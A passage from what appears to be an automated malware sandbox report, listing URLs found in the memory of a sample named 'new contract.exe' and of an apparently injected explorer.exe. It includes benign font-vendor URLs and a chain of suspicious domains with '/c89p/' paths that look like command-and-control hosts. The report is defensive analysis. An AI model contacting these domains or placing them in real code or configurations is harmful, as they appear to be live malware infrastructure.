          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hinawinner.top
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hinawinner.top/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hinawinner.top/c89p/www.torehousestudio.info
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hinawinner.topReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igmoto.info
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igmoto.info/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igmoto.info/c89p/www.olar-systems-panels-61747.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igmoto.infoReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innivip.bio
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innivip.bio/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innivip.bio/c89p/www.aser-cap-hair-growth.today
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innivip.bioReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ldkp.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ldkp.net/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ldkp.net/c89p/www.r64mh1.vip
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ldkp.netReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.livialiving.online
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.livialiving.online/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.livialiving.online/c89p/www.innivip.bio
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.livialiving.onlineReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olar-systems-panels-61747.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olar-systems-panels-61747.bond/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olar-systems-panels-61747.bond/c89p/www.arklife.shop
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olar-systems-panels-61747.bondReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oviepicker.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oviepicker.net/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oviepicker.net/c89p/www.hinawinner.top
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oviepicker.netReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plesacv.xyz
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plesacv.xyz/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plesacv.xyz/c89p/www.ldkp.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plesacv.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r64mh1.vip
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r64mh1.vip/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r64mh1.vip/c89p/www.aycare-service-99683.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r64mh1.vipReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: new contract.exe, 00000000.00000002.1743134989.0000000005904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com8W
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sofaerb.shop
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sofaerb.shop/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sofaerb.shop/c89p/www.uickautoquote.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sofaerb.shopReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.torehousestudio.info
          Source: explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.torehousestudio.info/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.torehousestudio.infoReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uickautoquote.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uickautoquote.net/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uickautoquote.net/c89p/www.plesacv.xyz
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uickautoquote.netReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
